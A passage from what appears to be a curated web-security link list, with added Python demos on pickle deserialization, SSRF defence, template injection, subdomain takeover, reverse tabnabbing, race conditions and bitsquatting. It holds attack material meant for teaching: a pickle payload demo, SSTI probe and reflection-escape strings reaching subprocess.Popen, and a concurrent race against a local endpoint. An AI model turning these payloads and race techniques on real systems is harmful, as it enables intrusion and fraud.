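    """Envelope: HMAC-SHA256 over the pickle, so only streams we produced are loaded."""
    return hmac.new(key, data, hashlib.sha256).digest() + data


def make_session(obj, key):
    return sign(pickle.dumps(obj), key)


def safe_load(blob, key):
    """Verify the MAC in constant time, then unpickle under the allow-list.
    Both layers matter: the MAC stops foreign streams, the allow-list limits the
    damage if the key ever leaks."""
    mac, data = blob[:32], blob[32:]
    if not hmac.compare_digest(mac, hmac.new(key, data, hashlib.sha256).digest()):
        raise ValueError("bad signature")
    return restricted_load(data)


def demo():
    """(what the vulnerable loader executed, whether the restricted loader refused it)."""
    payload = attacker_payload()
    ran = vulnerable_load(payload)
    try:
        restricted_load(payload)
        refused = False
    except pickle.UnpicklingError:
        refused = True
    return ran, refused
```

- The allow-list is the weaker of the two controls: anything that reaches `find_class` is already being executed by the unpickler's stack machine, and a permitted class with a dangerous `__setstate__` re-opens the problem. Prefer a data-only format (JSON with a schema) for anything a client can send, and keep pickle for data that never leaves your own trust boundary.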
- Ruby
- Articles/Blogposts/Writeups
- Talks
- Marshalling Pickles - Chris Frohoff & Gabriel Lawrence(OWASPAppSec California2015)
- Object serialization technologies allow programs to easily convert in-memory objects to and from various binary and textual data formats for storage or transfer – but with great power comes great responsibility, because deserializing objects from untrusted data can ruin your day. We will look at historical and modern vulnerabilities across different languages and serialization technologies, including Python, Ruby, and Java, and show how to exploit these issues to achieve code execution. We will also cover some strategies to protect applications from these types of attacks.
- 101
- General
- AllThingsSSRF
- This is a collection of writeups, cheatsheets, videos, related to SSRF in one single location
- Articles/Blogposts/Writeups
- SSRF vs Business-Critical Applications Part 1: XXE Tunneling In SAP NetWeaver - erpscan
- A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! - Orange Tsai - BH USA 17
- curl Based SSRF Exploits Against Redis
- Pivoting from blind SSRF to RCE with HashiCorp Consul
- How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE!
- Airbnb – Chaining Third-Party Open Redirect into Server-Side Request Forgery (SSRF) via LivePerson Chat - Brett Buerhaus
- CVE-2020-13379 Unauthenticated Full-Read SSRF in Grafana - rhynorater(2020)
- Blind SSRF exploitation - wallarm(2020)
- SVG SSRF Cheatsheet
- Finding SSRF via HTML Injection inside a PDF file on AWS EC2 - Riyaz Walikar(2020)
- Triggering a DNS lookup using Java Deserialization - ParanoidSoftware(2021)
- Bring Your Own SSRF – The Gateway Actuator - Wyatt(2021)
- Attacking Java RMI via SSRF - Tobias Neitzel(2021)
- A Glossary of Blind SSRF Chains - Shubham Shah(2021)
- SSRF vulnerabilities caused by SNI proxy misconfigurations - Aleksei Tiurin(2022)
- Exploiting URL Parsing Confusion - Noam Moshe(2022)
- SSRF vulnerabilities and where to find them - Luke Stephens(2022)
- What functionalities are most often vulnerable to SSRFs? Case study of 124 bug bounty reports - BBE
- Server Side Request Forgery (SSRF) and AWS EC2 instances after Instance Meta Data Service version 2(IMDSv2) - Riyaz Walikar(2022)
- URL Filter Subversion - Ricardo Henrique(2021)
- Papers
- Presentations, Talks, Videos
- Server-Side Browsing Considered Harmful - Nicolas Gregoire(AppSec EU15)
- A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages - Orange Tsai(BHUSA2017)
- Owning The Cloud Through Server-Side Request Forgery - Ben Sadeghipour, Cody Brocious (Daeken)
- With how many apps are running in the cloud, hacking these instances becomes easier with a simple vulnerability due to an unsanitized user input. In this talk, we’ll discuss a number of different methods that helped us exfil data from different applications using Server-Side Request Forgery (SSRF). Using these methods, we were able to hack some of the major transportation, hospitality, and social media companies and make $50,000 in rewards in 3 months.
- Server Side Request Forgery (SSRF) All-In-One - Busra Demir(2020)
- In this video, Busra Demir will explore how to exploit Server Side Request Forgery (SSRF) by using different attack scenarios. She will dig into how to exploit an SSRF vulnerability:
- On a Hack the Box machine called Player (SSRF - FFMPEG Exploit)
- On a Hack the Box machine called Kotarak (SSRF Filter Bypass/port scan)
- By combining SQL Injection on a VulnHub machine called 6Days
- Combined with HTML Injection on a VulnHub machine Gemini Inc 1
- Piercing The Veil: Server Side Request Forgery Attacks On Internal Networks - Alyssa Herrera(Hack.lu2019)
- Demystifying the Server Side - Rajanish Pathak, Rahul Maini & Harsh Jaiswal(EkoParty2020)
- Some server-side mysteries, the unveiling of the lesser-known techniques, and how inconsistency in the URL parsing and treating of certain elements by the server-side components that usually go undetected and can open up big gaps are waiting to be demystified!
- When TLS Hacks You - Joshua Maddux(Defcon Safemode2021)
- BHUSA2020 Slides
- Lots of people try to attack the security of TLS. But what if we use TLS to attack other things? It's a huge standard, and it turns out that features intended to make TLS fast have also made it useful as an attack vector. Among other things, these features provide a lot of flexibility for Server-Side Request Forgery (SSRF). While past work using HTTPS URLs in SSRF has relied upon platform-specific bugs such as SNI injection, we can go further. In this talk, I present a novel, cross-platform way of leveraging TLS to target internal services. Uniquely, these attacks are more effective the more comprehensively a platform supports modern TLS, so won't go away with library upgrades. It is also unlikely that the TLS spec will change overnight at the whim of a random security researcher. Instead, we need to walk through scenarios and dispel common assumptions so the audience can know what to look out for. Of course, the best way to do so is with demos!
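- Added example (not from any of the talks above, and not any project's code): the two SSRF defences the URL-parser talks keep coming back to, in Python. A substring allow-list passes URLs whose parsed host is actually 127.0.0.1 (userinfo and fragment tricks); the hardened check validates the scheme, takes the host the client will really connect to, resolves it, rejects every answer in a private, loopback, link-local or reserved range (the cloud metadata address included) and returns the IP to pin the connection to. `api.partner.example`, the addresses and both DNS tables are constructed; a real implementation replaces the table lookup with `socket.getaddrinfo`.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"api.partner.example"}
DEFAULT_PORTS = {"http": 80, "https": 443}

# Constructed DNS answers; the addresses are placeholders, not facts about any live host.
PARTNER_DNS = {"api.partner.example": ["93.184.216.34"]}
# The same allow-listed name after its record was re-pointed (or rebound) at the
# cloud metadata address: the name is still "allowed", the target is not.
REBOUND_DNS = {"api.partner.example": ["169.254.169.254"]}


def naive_is_allowed(url):
    """The check many vulnerable apps ship: is an allowed name somewhere in the URL?"""
    return any(host in url for host in ALLOWED_HOSTS)


def _is_internal(address):
    ip = ipaddress.ip_address(address)
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def safe_target(url, resolver=PARTNER_DNS.get):
    """Validate a user-supplied URL for a server-side fetch.

    Returns (scheme, host, pinned_ip, port). The caller must open the socket to
    pinned_ip and set the Host header itself; letting the HTTP library resolve
    the name again reopens the DNS-rebinding window."""
    parts = urlsplit(url)
    if parts.scheme not in DEFAULT_PORTS:
        raise ValueError(f"scheme {parts.scheme!r} not allowed")
    host = parts.hostname  # the host after userinfo ('user@') and fragment ('#') are stripped
    if host is None or host not in ALLOWED_HOSTS:
        raise ValueError(f"host {host!r} not in allow-list")
    addresses = resolver(host) or []
    if not addresses:
        raise ValueError(f"{host} does not resolve")
    for address in addresses:  # check every answer: rebinding returns mixed sets
        if _is_internal(address):
            raise ValueError(f"{host} resolves to internal address {address}")
    return parts.scheme, host, addresses[0], parts.port or DEFAULT_PORTS[parts.scheme]


def is_safe(url, resolver=PARTNER_DNS.get):
    try:
        safe_target(url, resolver)
        return True
    except ValueError:
        return False
```

- Two caveats the code cannot fix on its own: the fetch must not follow redirects blindly (re-run `safe_target` on every `Location`), and the check is only as good as the parser the HTTP client uses, which is the whole point of the "URL parser" talks above; if the fetching library is not Python's, compare its idea of the host with this one.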
- Writeups
- CRLF injection & SSRF in git:// protocol lead to arbitrary code execution - chromium1337(2018)
- GACTF 2020 SimpleFlask Challenge (SSTI) - Arash Parsa(2020)
- GACTF 2020 EZ FLASK (SSRF to SSTI) - Arash Parsa(2020)
- $10000 Facebook SSRF (Bug Bounty) - Amine Aboud(2020)
- Top 25 Server-Side Request Forgery (SSRF) Bug Bounty Reports - Lohitaksh Nandan(2023)
- 31k$ SSRF in Google Cloud Monitoring led to metadata exposure - David Nechuta(2020)
- Turning bad SSRF to good SSRF: Websphere Portal (CVE-2021-27748) - Shubham Shah(2021)
- Piercing the Veil: Server Side Request Forgery to NIPRNet access
- Testing
- Tools
- SSRFmap
- Automatic SSRF fuzzer and exploitation tool
- See-SURF
- A Python based scanner to find potential SSRF parameters in a web application. See-SURF helps you detect potential SSRF parameters and validates the finding by making a DNS/HTTP request back to your server.
- oidc-ssrf
- Evil OIDC server: the OpenID Configuration URL returns a 307 to cause SSRF.
- LORSRF
- Fast CLI tool to find the parameters that can be used to find SSRF or Out-of-band resource load
- TLS Poison
- A tool that allows for generic SSRF via TLS, as well as CSRF via image tags in most browsers. The goals are similar to SNI injection, but this new method uses inherent behaviors of TLS, instead of depending upon bugs in a particular implementation.
- SSRFIRE
- An automated SSRF finder. Just give the domain name and your server and chill! ;) Also has options to find XSS and open redirects
- General
- Testing
- Server-Side Template Injection
- 101
- Server-Side Template Injection: RCE for the modern webapp
- Server-Side Template Injection
- Video
- This paper defines a methodology for detecting and exploiting template injection, and shows it being applied to craft RCE zerodays for two widely deployed enterprise web applications. Generic exploits are demonstrated for five of the most popular template engines, including escapes from sandboxes whose entire purpose is to handle user-supplied templates in a safe way.
- SSTI: The Hidden Threat to Web Application Security - Pranav Khune(2022)
- Articles/Writeups
- Exploiting Custom Template Engines - Dalton Campbell
- Server-Side Template Injection - James Kettle(2015)
- Exploiting Jinja SSTI with limited payload size. - niebardzo(2020)
- Jinja2 SSTI Research - Chivato(2020)
- GitHub Pages - Multiple RCEs via insecure Kramdown configuration - $25,000 Bounty - vakzz(2020)
- RCE via Server-Side Template Injection - Gaurav Mishra(2020)
- Method Confusion In Go SSTIs Lead To File Read And RCE. - Gus Ralph(2021)
- Doing it the researcher’s way: How I Managed to Get SSTI (Server Side Template Injection) which lead to arbitrary file reading on One of the Leading Payment Systems in Asia - JzeeRx(2022)
- Bug Writeup: RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypass - h1pmnh, Dark9T(2022)
- Writeups
- Talks/Presentations/Videos
- SEC642: Killing snakes for fun, Flask SSTIs and RCEs in Python - Moses Frost(SANS)
- Here is a word: Reflection. How many times have you read the words SSTI or even CSTI and wondered what they actually did, how they worked, or how to execute one? How can you take a file reading vulnerability like SSTI into a Remote Code Execution exploit? In this talk we will give you a glance into the SEC642 topic on Server Side Template Injection in Flask and taking that one concept a few steps further by introducing Python Method Reflection to execute code, and even backdoors. Join Moses Frost as he discusses this and other topics that are found in SEC642: Advanced Web App Penetration Testing, Ethical Hacking, and Exploitation Techniques.
- Server-Side Template Injection: RCE For The Modern Web App - James Kettle(2015)
- In this presentation, I'll discuss techniques to recognize template injection, then show how to take template engines on a journey deeply orthogonal to their intended purpose and ultimately gain arbitrary code execution. I'll show this technique being applied to craft exploits that hijack four popular template engines, then demonstrate RCE zero-days on two corporate web applications. This presentation will also cover techniques for automated detection of template injection, and exploiting subtle, application-specific vulnerabilities that can arise in otherwise secure template systems.
- Server-Side Template Injection Workshop - Tib3rius(2021)
- Room for Escape: Scribbling Outside the Lines of Template Security - Alvaro Muñoz, Oleksandr Mirosh
- "Now more than ever, digital communication and collaboration are essential to the modern human experience. People around the globe work together online as they share information, create documents, send emails, and collaborate on spreadsheets and presentations. Shared digital content is everywhere and networked communication platforms and software play a crucial role. Content Management Systems (CMS) allow the user to design, create, modify, and visualize dynamic content. For many companies, CMS platforms are pivotal to their content pipelines and workforce collaboration."
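- Added example (not code from Kettle's paper, the SANS talk or any template engine): the mechanics the talks above describe, run against a constructed stand-in engine. The stand-in evaluates `{{ ... }}` as a Python expression with no builtins, which is enough to show three things: the difference between user input in the template source and user input passed as context (the Jinja2 equivalent is `Template(user_input)` versus `Template(fixed).render(name=user_input)`), the `{{7*7}}` detection probe, and the reflection walk from the SEC642 talk, where `''.__class__.__mro__[1].__subclasses__()` reaches `subprocess.Popen` even though builtins were removed. `render`, `greet_vulnerable` and `greet_safe` are names chosen for the example.

```python
import re
import subprocess  # imported so subprocess.Popen is loaded, as in any web app that shells out

EXPR = re.compile(r"\{\{(.*?)\}\}")


def render(template, context):
    """Constructed stand-in for an expression-evaluating template engine: every
    {{ ... }} is evaluated as a Python expression whose only names are the context
    and with __builtins__ stripped. Output is not re-scanned, exactly as real
    engines treat substituted values as data."""
    def _evaluate(match):
        return str(eval(match.group(1).strip(), {"__builtins__": {}}, dict(context)))
    return EXPR.sub(_evaluate, template)


def greet_vulnerable(name):
    """User input becomes part of the template source: SSTI."""
    return render("Hello " + name + "!", {})


def greet_safe(name):
    """User input is passed as data; the template source is a constant."""
    return render("Hello {{ name }}!", {"name": name})


def detect_ssti(endpoint):
    """Kettle's probe: arithmetic the engine evaluates but a plain string would not."""
    return "49" in endpoint("{{7*7}}")


def reflection_escape():
    """The walk from the Flask/Jinja talk: with builtins gone, attribute access on a
    string literal still reaches object.__subclasses__(), and from that list
    subprocess.Popen (hence command execution) is one index away. Returns whether
    Popen showed up; the example stops short of calling it."""
    listing = greet_vulnerable("{{ ''.__class__.__mro__[1].__subclasses__() }}")
    return "subprocess.Popen" in listing
```

- The probe should be widened to the polyglot from the paper (`${{<%[%'"}}%\`) when the engine is unknown, and an error page counts as a hit as much as `49` does. The fix is the shape of `greet_safe`, not a sandbox: Kettle's paper shows sandbox escapes for engines whose whole purpose is to run user-supplied templates.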
- Tools
- tplmap
- Code and Server-Side Template Injection Detection and Exploitation Tool
- 101
- Client-Side Template Injection
- 101
- Client-side template injection - PortSwigger
- "Client-side template injection vulnerabilities arise when applications using a client-side template framework dynamically embed user input in web pages. When a web page is rendered, the framework will scan the page for template expressions, and execute any that it encounters. An attacker can exploit this by supplying a malicious template expression that launches a cross-site scripting (XSS) attack."
- Client-side template injection - PortSwigger
- Articles/Papers/Talks/Writeups
- Reflected XSS on developer.uber.com via Angular template injection - albinowax(2015)
- XSS without HTML: Client-Side Template Injection with AngularJS - Gareth Heyes(2016/2020)
- So you thought you were safe using AngularJS. . . . Think again! - Lewis Arden(2017)
- Angular Template Injection Payloads
- Client-side Template Injection - ANZ Coders(2018)
- Browsers' security controls, backend security libraries and HTTP response security headers have made it very difficult to exploit common security vulnerabilities (yes, you know it, XSS!). However, a trend of insecure usage of JSMVCs has flipped the coin to an attacker advantage. The attacker can misuse rich functionalities brought by a JSMVC to bypass security controls. In this presentation/workshop I will elaborate one of the frontend security vulnerabilities classes, i.e. Client-Side Template Injection (CSTI) and demonstrate how a real-world attack can happen. I will conclude my presentation on best-practices to effectively protect our applications against CSTI.
- Client Side Template Injection - Kacper Szurek(2019)
- Payment Tampering Using Template Injection - Team we45
- Angular Template Injection without Quote Characters - Aviv Yahav(2020)
- Reflected XSS on Microsoft.com via Angular Js template injection - Pratik Dabhi(2020)
- How I Stole Plunker Session Tokens with an Angular Expression - Ryan Hanson(2021)
- Client Side Template Injection (CSTI) - Hacktricks
- 101
- Purposefully Vulnerable Webapps
- Breakable Flask
- A simple vulnerable Flask application.
- Hackable - JasonHinds
- A python flask app that is purposefully vulnerable to SQL injection and XSS attacks
- Injecting Flask - Nvisium
- Template Injection Workshop: Twig, Jinja, Freemaker and more - GoSecure(2020)
- Code
- Workshop page
- Welcome to this 2-hour workshop on Template Injection. Template injection, also known as Server-Side Template Injection (SSTI), is a vulnerability class that emerged in 2015. The 2015 Black Hat talk from James Kettle established the foundations for the exploitation techniques in multiple template engines. The exploitation of this type of issue will require specific knowledge of the template library or the language being used under the hood. The workshop is divided into six labs and an introduction. First, there will be an introduction to the vulnerability. This segment is needed to get a good understanding of the attack patterns to recognize potential vulnerabilities. Then we will investigate five different template engines with unique twists. Each template engine will have an exercise which consists of a web application with a template engine being exposed.
- Tools
- 101
- Articles/Blogposts/Writeups
- Hostile Subdomain Takeover using Heroku/Github/Desk + more - Detectify
- 5 Subdomain Takeover #ProTips - Patrik Hudak
- can-i-take-over-xyz
- "Can I take over XYZ?" — a list of services and how to claim (sub)domains with dangling DNS records.
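- Added example (not part of this page or of can-i-take-over-xyz): the DNS half of a dangling-record check in Python. It follows the CNAME chain from each name in a zone we control and flags the ones whose chain ends in NXDOMAIN, which is the precondition every entry in that list starts from. The zone `example.test`, the hostnames and the DNS table are constructed; a real scan replaces the table with resolver queries.

```python
# Constructed DNS view of a zone we own plus a third-party hosting name.
# A real scan queries these with the system resolver; None means NXDOMAIN.
FAKE_DNS = {
    "www.example.test": ("A", ["192.0.2.10"]),
    "shop.example.test": ("CNAME", "shop-example.legacy-host.example"),
    "shop-example.legacy-host.example": ("A", ["192.0.2.20"]),
    "old.example.test": ("CNAME", "old-example.legacy-host.example"),
    # old-example.legacy-host.example: the hosted app was deleted, our CNAME stayed.
}


def resolve_chain(name, table=FAKE_DNS, max_depth=8):
    """Follow CNAMEs from name; return (names visited, terminal record or None)."""
    chain = [name]
    for _ in range(max_depth):
        record = table.get(chain[-1])
        if record is None or record[0] != "CNAME":
            return chain, record
        chain.append(record[1])
    raise ValueError(f"CNAME chain from {name} exceeds {max_depth} hops")


def classify(name, table=FAKE_DNS):
    """'ok', 'nxdomain', or 'dangling-cname': our record points at a name that
    no longer exists, so whoever can register that name answers for ours."""
    chain, terminal = resolve_chain(name, table)
    if terminal is not None:
        return "ok"
    return "dangling-cname" if len(chain) > 1 else "nxdomain"


def dangling_records(zone, table=FAKE_DNS):
    """(our name, missing target) for every dangling CNAME under the zone."""
    suffix = "." + zone
    findings = []
    for name in sorted(table):
        if name.endswith(suffix) and classify(name, table) == "dangling-cname":
            findings.append((name, resolve_chain(name, table)[0][-1]))
    return findings
```

- NXDOMAIN is only one signal. Many providers answer for unclaimed names with a default page, so the target resolves and the check above says "ok"; those need the per-service HTTP fingerprints that can-i-take-over-xyz maintains, and delegated NS records need the same treatment at the zone level.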
- Talks/Presentations
- DNS hijacking using cloud providers - Frans Rosén - Security Fest 2017
- A few years ago, Frans and his team posted an article on Detectify Labs regarding domain hijacking using services like AWS, Heroku and GitHub. These issues still remain and are still affecting a lot of companies. Jonathan Claudius from Mozilla even calls "Subdomain takeover" "the new XSS". Since then, many tools have popped up to spot these sorts of vulnerabilities. Frans will go through both the currently disclosed and the non-disclosed ways to take control over domains and will share the specific techniques involved.
- Subdomain Takeovers, beyond the basics for Pentesters and Bug Bounty Hunters - Codingo(2020)
- Discover the tricks to subdomain takeovers that go beyond the basics, allowing you to find more impactful findings in a pentest, or on a bug bounty program.
- Tools
- 101
- Tabnabbing: A New Type of Phishing Attack - Aza Raskin
- Reverse Tabnabbing - OWASP
- Reverse tabnabbing is an attack where a page linked from the target page is able to rewrite that page, for example to replace it with a phishing site. As the user was originally on the correct page they are less likely to notice that it has been changed to a phishing site, especially if the site looks the same as the target. If the user authenticates to this new page then their credentials (or other sensitive data) are sent to the phishing site rather than the legitimate one.
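A check for the exposure OWASP describes, as an added example rather than OWASP's code: a small HTML auditor that reports `target="_blank"` links and forms without `rel="noopener"` (or `noreferrer`, which implies it), and `window.open()` calls whose feature string lacks `noopener`. The sample page is constructed.

```python
"""Reverse-tabnabbing auditor (added example; constructed sample page)."""
import re
from html.parser import HTMLParser


class TabnabbingAuditor(HTMLParser):
    """Flags navigations that open a new browsing context while leaving
    window.opener reachable from the opened page."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False
        self._script = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "script":
            self._in_script = True
        if tag in ("a", "area", "form") and a.get("target", "").lower() == "_blank":
            rel = set(a.get("rel", "").lower().split())
            if not rel & {"noopener", "noreferrer"}:   # noreferrer implies noopener
                self.findings.append({"line": self.getpos()[0], "kind": tag,
                                      "target": a.get("href") or a.get("action", "")})

    def handle_data(self, data):
        if self._in_script:                          # <script> bodies arrive as raw data
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag != "script":
            return
        self._in_script = False
        code, self._script = "".join(self._script), []
        # Heuristic: window.open(url, name, features) with no 'noopener' feature.
        for m in re.finditer(r"window\.open\s*\(([^)]*)\)", code):
            if "noopener" not in m.group(1):
                self.findings.append({"line": self.getpos()[0], "kind": "window.open",
                                      "target": m.group(1).strip()})


def audit(html: str) -> list:
    p = TabnabbingAuditor()
    p.feed(html)
    p.close()
    return p.findings


# Constructed sample: two unsafe openers, one correctly annotated link.
SAMPLE = """<html><body>
<a href="https://partner.example/offers" target="_blank">Offers</a>
<a href="https://docs.example/" target="_blank" rel="noopener noreferrer">Docs</a>
<script>
  function go(u) { window.open(u, '_blank'); }
</script>
</body></html>"""

if __name__ == "__main__":
    for f in audit(SAMPLE):
        print(f"line {f['line']}: {f['kind']} -> {f['target']}  (add rel=\"noopener\" / the 'noopener' feature)")
```

Current Chromium, Firefox and Safari already treat `target="_blank"` anchors as `noopener`, but the explicit `rel` is still what the page should carry: older browsers, and `window.open` without the feature string, still hand the new page a usable `window.opener`.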
- Articles/Papers/Talks/Writeups
- Tools
- 101
- Articles/Blogposts/Writeups
- Papers
- Race Detection for Web Applications - Boris Petrov, Martin Vechev, Manu Sridharan, Julian Dolby
- We present the first formulation of a happens-before relation for common web platform features. Developing this relation was a non-trivial task, due to complex feature interactions and browser differences. We also present a logical memory access model for web applications that abstracts away browser implementation details. Based on the above, we implemented WEBRACER, the first dynamic race detector for web applications. WEBRACER is implemented atop the production-quality WebKit engine, enabling testing of full-featured web sites. WEBRACER can also simulate certain user actions, exposing more races. We evaluated WEBRACER by testing a large set of Fortune 100 company web sites. We discovered many harmful races, and also gained insights into how developers handle asynchrony in practice.
- Exposing Private Information by Timing Web Applications - Andrew Bortz, Dan Boneh, Palash Nandy(2007)
- "We show that the time web sites take to respond to HTTP requests can leak private information, using two different types of attacks. The first, direct timing, directly measures response times from a web site to expose private information such as validity of an username at a secured site or the number of private photos in a publicly viewable gallery. The second, cross-site timing, enables a malicious web site to obtain information from the user’s perspective at another site. For example, a malicious site can learn if the user is currently logged in at a victim site and, in some cases, the number of objects in the user’s shopping cart. Our experiments suggest that these timing vulnerabilities are wide-spread. We explain in detail how and why these attacks work, and discuss methods for writing web application code that resists these attacks."
- Opportunities and Limits of Remote Timing Attacks - Scott A. Crosby, Dan S. Wallach, Rudolf H. Riedi(2009)
- "Our work analyzes the limits of attacks based on accurately measuring network response times and jitter over a local network and across the Internet. We present the design of filters to significantly reduce the effects of jitter, allowing an attacker to measure events with 15-100μs accuracy across the Internet, and as good as 100ns over a local network. Notably, security-related algorithms on Web servers and other network servers need to be carefully engineered to avoid timing channel leaks at the accuracy demonstrated in this article."
- Cross-origin pixel stealing: Timing attacks using CSS filters - Robert Kotcher, Yutong Pei, Pranjal Jumde, Collin Jackson(2013)
- The Clock is Still Ticking: Timing Attacks in the Modern Web - Tom Van Goethem, Wouter Joosen, Nick Nikiforakis(2015)
- "In this paper, we show that modern browsers expose new side-channels that can be used to acquire accurate timing measurements, regardless of network conditions. Using several real-world examples, we introduce four novel web-based timing attacks against modern browsers and describe how an attacker can use them to obtain personal information based on a user’s state on a cross-origin website. We evaluate our proposed attacks and demonstrate that they significantly outperform current attacks in terms of speed, reliability, and accuracy. Furthermore, we show that the nature of our attacks renders traditional defenses, i.e., those based on randomly delaying responses, moot and discuss possible server-side defense mechanisms."
- Timeless Timing Attacks: Exploiting Concurrency to Leak Secrets over Remote Connections - Tom Van Goethem, Christina Pöpper, Wouter Joosen, Mathy Vanhoef(2020)
- "In this paper, we introduce a conceptually novel type of timing attack that leverages the coalescing of packets by network protocols and concurrent handling of requests by applications. These concurrency-based timing attacks infer a relative timing difference by analyzing the order in which responses are returned, and thus do not rely on any absolute timing information. We show how these attacks result in a 100-fold improvement over typical timing attacks performed over the Internet, and can accurately detect timing differences as small as 100ns, similar to attacks launched on a local system. We describe how these timing attacks can be successfully deployed against HTTP/2 webservers, Tor onion services, and EAP-pwd, a popular Wi-Fi authentication method."
- Tools
- Requests-Racer
- Requests-Racer is a small Python library that lets you use the Requests library to submit multiple requests that will be processed by their destination servers at approximately the same time, even if the requests have different destinations or have payloads of different sizes. This can be helpful for detecting and exploiting race condition vulnerabilities in web applications. (For more information, see motivation.md.)
- Race the Web
- Tests for race conditions in web applications by sending out a user-specified number of requests to a target URL (or URLs) simultaneously, and then compares the responses from the server for uniqueness. Includes a number of configuration options.
- timing_attack
- Perform timing attacks against web applications
- Race condition exploit
- Tool to help with the exploitation of web application race conditions
- OWASP TimeGap Theory
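The class of bug these tools target, as an added example rather than any of their code: a coupon endpoint with a check-then-act window, served from Python's standard library on 127.0.0.1 and hit by `n` pre-connected clients released together by a barrier (a simplified form of the synchronised sending that Requests-Racer and Race the Web do over a real network). The store, endpoint and coupon code are constructed; the lock-protected variant is the fix.

```python
"""Check-then-act race in a local HTTP service (added example; constructed endpoint)."""
import http.client
import threading
import time
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.parse import parse_qs, urlparse

RACE_WINDOW = 0.1   # seconds between check and act; stands in for a DB round trip


class CouponStore:
    """Single-use coupons. serialized=False is the bug, serialized=True the fix."""

    def __init__(self, serialized: bool) -> None:
        self.redeemed = set()
        self.serialized = serialized
        self._lock = threading.Lock()

    def _check_then_act(self, code: str) -> bool:
        if code in self.redeemed:            # check
            return False
        time.sleep(RACE_WINDOW)              # every concurrent request passes the check here
        self.redeemed.add(code)              # act
        return True

    def redeem(self, code: str) -> bool:
        if not self.serialized:
            return self._check_then_act(code)
        with self._lock:                     # check and act become one atomic step
            return self._check_then_act(code)


def start_server(store: CouponStore) -> ThreadingHTTPServer:
    """Serve POST /redeem?code=... on an ephemeral loopback port."""

    class Handler(BaseHTTPRequestHandler):
        def do_POST(self):
            url = urlparse(self.path)
            code = parse_qs(url.query).get("code", [""])[0]
            ok = url.path == "/redeem" and store.redeem(code)
            self.send_response(200 if ok else 409)
            self.end_headers()
            self.wfile.write(b"REDEEMED" if ok else b"ALREADY_USED")

        def log_message(self, *args):        # silence per-request logging
            pass

    srv = ThreadingHTTPServer(("127.0.0.1", 0), Handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def race(port: int, code: str, n: int = 8) -> int:
    """Pre-open n connections, release all requests at once, count 200s."""
    barrier = threading.Barrier(n)
    statuses = []

    def worker():
        conn = http.client.HTTPConnection("127.0.0.1", port, timeout=10)
        try:
            conn.connect()                   # TCP handshake done before the barrier
            barrier.wait(timeout=10)         # ... so only the request bytes remain
            conn.request("POST", f"/redeem?code={code}")
            statuses.append(conn.getresponse().status)
        except Exception:
            statuses.append(-1)
        finally:
            conn.close()

    threads = [threading.Thread(target=worker) for _ in range(n)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return statuses.count(200)


def demo(n: int = 8):
    """Return (accepted redemptions against the racy store, against the locked store)."""
    accepted = []
    for serialized in (False, True):
        srv = start_server(CouponStore(serialized))
        try:
            accepted.append(race(srv.server_address[1], "SAVE10", n))
        finally:
            srv.shutdown()
            srv.server_close()
    return tuple(accepted)


if __name__ == "__main__":
    racy, locked = demo()
    print(f"racy store accepted {racy} redemptions of one coupon; locked store accepted {locked}")
```

A correct service accepts exactly one redemption regardless of how the requests are timed; the racy store accepts as many as arrive inside the window. Against a real target the window is a database round trip rather than a sleep, which is why the tools above work at getting requests to land within microseconds of each other.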
- Miscellaneous
- 101
- TLS Redirection (and Virtual Host Confusion) - GrrDog
- The goal of this document is to raise awareness of a little-known group of attacks, TLS redirection / Virtual Host Confusion, and to bring all the information related to this topic together.
- Articles/Papers/Talks/Writeups
- General
- Tools
- Miscellaneous
- 101
- 101
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
- Examining the Bitsquatting Attack Surface - Jaeson Schultz(Defcon21)
- Paper
- Bit errors in computer memory, when they occur in a stored domain name, can cause Internet traffic to be directed to the wrong location, potentially compromising security. When a domain name one bit different from a target domain is registered, this is called "bitsquatting". This presentation builds on previous work in this area presented by Artem Dinaburg at Black Hat 2011. Cisco's research into bitsquatting has revealed several previously unknown vectors for bitsquatting. Cisco has also discovered several new mitigations which involve neither the installation of error-correcting memory nor the mass registration of bitsquat domains. In fact, some of the new mitigations have the potential to consign the problem of bitsquatting to the dustbin of history.
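The enumeration the talk builds on, as an added example that is neither Cisco's nor the speaker's code: every DNS-valid name one bit-flip away from a target's registrable label, which is the set a defender registers or monitors and the set a squatter registers. It assumes a single-label TLD (`example.com`, not `example.co.uk`).

```python
"""Bitsquat candidate generation (added example)."""
import string

HOST_CHARS = frozenset(string.ascii_lowercase + string.digits + "-")
# Upper-case letters are deliberately absent: DNS is case-insensitive, so a
# flip that only changes case ('e' -> 'E') is the same name, not a squat.


def bit_distance(a: str, b: str) -> int:
    """Differing bits between two equal-length ASCII strings."""
    if len(a) != len(b):
        raise ValueError("labels must have equal length")
    return sum(bin(ord(x) ^ ord(y)).count("1") for x, y in zip(a, b))


def bitflip_label(label: str) -> set:
    """Every distinct, DNS-valid label exactly one bit-flip away from `label`."""
    label = label.lower()
    variants = set()
    for i, ch in enumerate(label):
        for bit in range(8):                      # one flipped bit per candidate
            flipped = chr(ord(ch) ^ (1 << bit))
            if flipped not in HOST_CHARS:
                continue                          # control, punctuation, upper case or non-ASCII
            candidate = label[:i] + flipped + label[i + 1:]
            if candidate[0] == "-" or candidate[-1] == "-":
                continue                          # a label may not start or end with a hyphen
            variants.add(candidate)
    return variants


def bitsquat_domains(domain: str) -> list:
    """Registrable bitsquats of `domain` (single-label TLD assumed): only the
    label directly left of the TLD is varied, because a flipped bit in any
    deeper label still resolves under a zone the legitimate owner controls."""
    labels = domain.lower().strip(".").split(".")
    if len(labels) < 2:
        raise ValueError("expected at least name.tld")
    sld, tld = labels[-2], labels[-1]
    return sorted(f"{v}.{tld}" for v in bitflip_label(sld))


if __name__ == "__main__":
    squats = bitsquat_domains("example.com")
    print(f"{len(squats)} bitsquat candidates for example.com:")
    print(", ".join(squats))
```

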